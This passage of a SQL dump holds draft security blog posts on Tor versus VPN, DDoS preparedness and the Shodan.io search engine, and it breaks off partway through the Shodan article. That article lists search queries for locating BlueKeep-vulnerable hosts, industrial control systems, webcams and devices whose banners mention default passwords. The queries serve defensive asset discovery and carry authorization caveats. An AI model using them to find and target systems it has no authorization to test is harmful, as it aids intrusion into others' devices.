dir=\"ltr\">Understanding what your ISP can see and adopting effective tools to safeguard your online presence is essential in this digital age. From encrypted browsing to secure file downloads, incorporating VPNs and Tor into your cybersecurity strategy can go a long way in ensuring privacy.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start today by making these changes to protect your online identity. Empower yourself with the knowledge and tools that put you in control of your digital information. For more advanced cybersecurity tips, explore our blog and learn how to maximize your privacy!</p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:20:01', '2026-01-12 21:41:44', 'Information Security', 'Enhancing Online Privacy: Choosing Between Tor and VPN', '', NULL),
(124, 'DDoS Attacks! How to Stay Protected', 'ddos-attacks-how-to-stay-protected', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A Distributed Denial of Service (DDoS) attack is one of the most common and disruptive cyber threats your business can face. These attacks essentially flood your website with junk traffic, overwhelming your servers and making your website inaccessible to legitimate visitors. For any business, a downed website means lost revenue, damaged reputation, and frustrated customers.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The good news? With the right preparation and response strategy, you can mitigate the damage of a DDoS attack and keep your website running smoothly. This blog will explore detailed steps to safeguard your digital presence.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">What is a DDoS Attack?</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding what a DDoS attack is and how it works is the first step in protecting your website. A DDoS attack overwhelms your website\'s resources, such as bandwidth and server capacity, by sending a massive amount of fake traffic all at once. This traffic overload prevents real users from accessing your website, crippling your online operations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These attacks can be motivated by financial gain, personal grudges, or even competition. 
Regardless of the reason, protecting your online assets with strong <b><strong class=\"font-bold\">cybersecurity tools</strong></b> is critical.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">5 Steps to Effectively Handle DDoS Attacks</strong></b></h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Build Cybersecurity Awareness Among Your Team</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think of cybersecurity like protecting your home; you wouldn\'t leave the doors wide open, would you? Similarly, your website needs strong defenses. To start, educate yourself and your team about DDoS attacks, how they work, and their warning signs. Slow loading times, sudden error messages, or a massive (and unexpected) traffic spike are often signs of an attack.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The more your team understands these potential threats, the faster you can react. Equipping your team with knowledge and basic <b><strong class=\"font-bold\">cybersecurity tips</strong></b> is your first line of defense.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Create a DDoS Response Strategy</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Preparation is key. 
Much like having a fire escape plan at home, your business should have a response strategy for a DDoS attack.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how to design your strategy:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Assign roles and responsibilities. Who will communicate with customers, and who will handle technical solutions?</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Include contact information for your internet service provider and any relevant cybersecurity services.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Make a checklist for immediate actions, such as identifying the attack type, configuring filters, and contacting necessary service providers.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Having this plan in place reduces panic and ensures a more organized response in the event of an attack.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Communicate Transparently During an Attack</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When your website is hit by a DDoS attack, clear communication with all stakeholders is essential. Notify your customers, partners, and employees about the situation as soon as possible. 
Explain what a DDoS attack is and assure them you are actively working on a solution.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Open communication builds trust and ensures stakeholders remain patient. Use clear updates to avoid confusion and keep everyone informed about the restoration timeline. No one likes feeling left in the dark.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">4. Use Cybersecurity Tools to Mitigate the Attack</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While your team stays calm, your IT experts should focus on responding effectively. Using <b><strong class=\"font-bold\">network security</strong></b> tools like firewalls and DDoS protection services can help filter out unwanted traffic and limit the impact of the attack. 
Here are some tools and services to consider:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">DDoS Protection Services</strong></b> like Cloudflare or AWS Shield, which act as a shield against bad traffic.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Traffic Filtering Solutions</strong></b> that differentiate between legitimate users and malicious bots attempting to overload your site.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Content Delivery Networks (CDNs)</strong></b> that distribute your server load to minimize the impact on your core infrastructure. Note that a CDN or scrubbing service only helps if attackers cannot bypass it: configure your origin servers to accept traffic only from the provider, and avoid leaking the origin IP address through stale DNS records, mail headers, or direct-to-origin subdomains.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These tools serve as the “security guards” of your digital landscape, letting legitimate users in while blocking harmful traffic.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">5. Learn and Improve After the Attack</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once the storm has passed and your website is back online, take the time to analyze what happened. 
Here’s how:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Review what went well during your team\'s response and identify areas that need improvement.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Strengthen weaknesses in your network security or response strategy.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Schedule a post-attack audit to ensure no long-term damage was inflicted.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think of it like fortifying your home after a break-in. By improving your defenses, you\'re making it significantly harder for attackers to succeed next time.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Bonus Tips to Strengthen Your DDoS Preparedness</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Following these steps is a great start, but there’s more you can do to build a robust defense. 
Here are some bonus tips:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Practice Makes Perfect</strong></b>: Conduct regular DDoS drills to evaluate your team\'s readiness and effectiveness.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Stay Updated</strong></b>: Cyber threats evolve rapidly. Keep up with the latest <b><strong class=\"font-bold\">cybersecurity tools</strong></b> and DDoS trends to stay a step ahead of attackers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Educate Your Team</strong></b>: Provide regular training on identifying phishing attempts and other social engineering tactics often used alongside DDoS attacks.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">The Importance of Proactive Network Security</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your website is the heart of your online presence, and protecting it isn\'t just about preventing downtime—it\'s about ensuring trust. Both your customers and your employees rely on your website to function smoothly. 
With proactive measures like a DDoS response plan, transparent communication, and the implementation of <b><strong class=\"font-bold\">network security</strong></b> tools, your organization can confidently reduce the risks associated with DDoS attacks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, preparation is your best defense. Use these strategies to enhance your business\'s resilience against cyber threats and maintain a secure digital presence.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Need help taking the next step? Download our free guide to creating a comprehensive DDoS response plan and fortify your defenses today!</p>\r\n<p data-sourcepos=\"43:1-43:267\"><a href=\"https://infoseclabs.io/wp-content/uploads/2024/06/DDOS-INCIDENT-RESPONSE.pdf\">DDOS INCIDENT RESPONSE</a></p>', '', NULL, NULL, 1, 'draft', '2024-08-01 03:18:42', '2026-01-12 21:41:44', 'Information Security', 'DDoS Attacks! How to Stay Protected', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(125, 'Exploring Shodan.io: A Powerful Tool in Cybersecurity', 'exploring-shodan-io-a-powerful-tool-in-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The field of cybersecurity continues to evolve, and the demand for powerful, effective tools that identify and mitigate risks has never been more critical. Among the arsenal available to cybersecurity professionals, <b><strong class=\"font-bold\">Shodan.io</strong></b> stands out as an exceptional resource, enabling users to explore the landscape of internet-connected devices.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog post will provide an in-depth introduction to <b><strong class=\"font-bold\">Shodan.io</strong></b>, explain its core functionalities, and highlight how this tool is reshaping the way we approach <b><strong class=\"font-bold\">cybersecurity</strong></b>, particularly in the realms of <b><strong class=\"font-bold\">network security</strong></b> and <b><strong class=\"font-bold\">IoT security</strong></b>.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Is Shodan.io?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike traditional search engines that focus on web pages, <b><strong class=\"font-bold\">Shodan.io</strong></b> is specifically designed to index internet-connected devices—ranging from servers and routers to webcams and industrial systems. 
This tool goes beyond the conventional, allowing users to collect vital information like device types, physical locations, software versions, and potential security vulnerabilities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For <b><strong class=\"font-bold\">cybersecurity professionals</strong></b>, this makes Shodan.io an essential tool, offering unparalleled insights into the ecosystem of internet-connected devices and helping identify areas of potential risk.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Benefits of Shodan.io for Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io empowers organizations by improving their ability to monitor, analyze, and secure their networks. Here’s a closer look at how cybersecurity professionals use it to enhance their <b><strong class=\"font-bold\">network security</strong></b> operations:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Vulnerability Assessment</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">One of Shodan.io’s most valuable features is its ability to streamline vulnerability assessments. 
Using specific queries, professionals can search for internet-facing systems running outdated or vulnerable software.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `apache/2.4.20`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: This query identifies servers whose banner advertises Apache version 2.4.20, which may have known vulnerabilities. A banner version is not proof of exploitability: many Linux distributions backport security fixes without changing the version string, and banners can be edited or faked, so teams should confirm findings on systems they are authorized to test before prioritizing remediation.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Network Enumeration</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io enables comprehensive network mapping, allowing users to identify the publicly accessible assets Shodan has observed within a specific IP range (its data is a periodic snapshot, not a live scan, so recently added or removed services may not be reflected). 
By understanding their digital footprint, organizations can strengthen their defenses.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `net:203.0.113.0/24`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: This query discovers devices Shodan has indexed within a particular public IP range (replace the documentation range shown with a range your organization actually owns). Private address space such as 192.168.0.0/16 and the other RFC 1918 ranges is not routable on the internet and will never appear in Shodan results. Cybersecurity teams can then analyze these devices to identify potential weak points.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Default Credentials Identification</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Devices using weak or default credentials are a common vulnerability. 
Shodan.io makes it easy to identify such devices before attackers can exploit them.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `default password`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: This searches for service banners that contain the words “default password” (Shodan matches banner text only; it does not test any credentials), which helps teams find their own exposed devices and address major security gaps preemptively. Attempting to log in to a device you do not own or have written authorization to test is unauthorized access and illegal in most jurisdictions, even when the credentials are the factory defaults.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">IoT Device Security</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise of the <b><strong class=\"font-bold\">Internet of Things (IoT)</strong></b>, the potential attack surface is larger than ever. Shodan.io offers insights into IoT device security by surfacing exposed services on connected devices like webcams or routers.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `port:554 has_screenshot`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: This identifies devices using port 554, often for RTSP streaming services like webcams. 
Cybersecurity professionals can assess the risk posed by these devices and implement appropriate safeguards.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. <b><strong class=\"font-bold\">Geolocation Mapping</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io’s geolocation capabilities enable professionals to estimate the geographic location of devices. This location comes from IP geolocation databases, so it reflects where an address is registered or routed (often only to country or city level) rather than a precise physical position, and it can be misleading for VPN endpoints, cloud providers, and mobile networks. With that caveat, it is still useful for incident response and threat analysis.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Query</strong></b>: `country:\"US\"`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Description</strong></b>: By specifying a country, users can identify devices whose IP addresses geolocate to that region. This information assists in creating effective response plans and understanding the global distribution of connected devices.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Essential Shodan.io Search Queries for Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io offers a wide range of queries to help professionals identify vulnerabilities and protect internet-connected devices. 
Here are some of the most critical queries you should know:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Software Version Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><i><em class=\"italic\">Query</em></i>: `apache/2.4.20`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><i><em class=\"italic\">Example</em></i>: Find servers with a specific version of Apache that may have exploitable vulnerabilities.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Service Banner Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><i><em class=\"italic\">Query</em></i>: `title:\"Cisco Adaptive Security Appliance\"`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><i><em class=\"italic\">Example</em></i>: Locate Cisco ASA firewalls based on service banners.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong 
class=\"font-bold\">Vulnerability-Specific Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><i><em class=\"italic\">Query</em></i>: `vuln:cve-2019-0708`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\"><i><em class=\"italic\">Example</em></i>: Locate devices Shodan flags as likely affected by a given CVE, here CVE-2019-0708 (BlueKeep, the Windows RDP vulnerability). The vuln filter is not available on free accounts, and its matches are inferred from banner versions rather than verified, so confirm findings on systems you are authorized to test.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\"><b><strong class=\"font-bold\">SSH Key Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\"><i><em class=\"italic\">Query</em></i>: `port:22 has_ssh`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"9\"><i><em class=\"italic\">Example</em></i>: Identify hosts with an SSH service exposed on port 22 (if your Shodan plan does not recognize the has_ssh filter, `port:22` on its own returns the same hosts). Internet-exposed SSH is a target for password guessing, so it should be limited to key-based authentication and trusted source addresses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"10\"><b><strong class=\"font-bold\">Industrial Control Systems (ICS) Search</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"11\"><i><em class=\"italic\">Query</em></i>: `tag:ics`</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"12\"><i><em class=\"italic\">Example</em></i>: Detect vulnerable ICS 
devices critical to industrial operations.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Shodan.io Is a Game-Changer for Network Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io fundamentally changes the way cybersecurity professionals approach network and <b><strong class=\"font-bold\">IoT security</strong></b>. Here’s why it’s indispensable for enterprises and organizations:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Risk Management</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Shodan.io makes it easier to identify weak points in a network, ensuring a proactive approach to mitigating vulnerabilities.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] 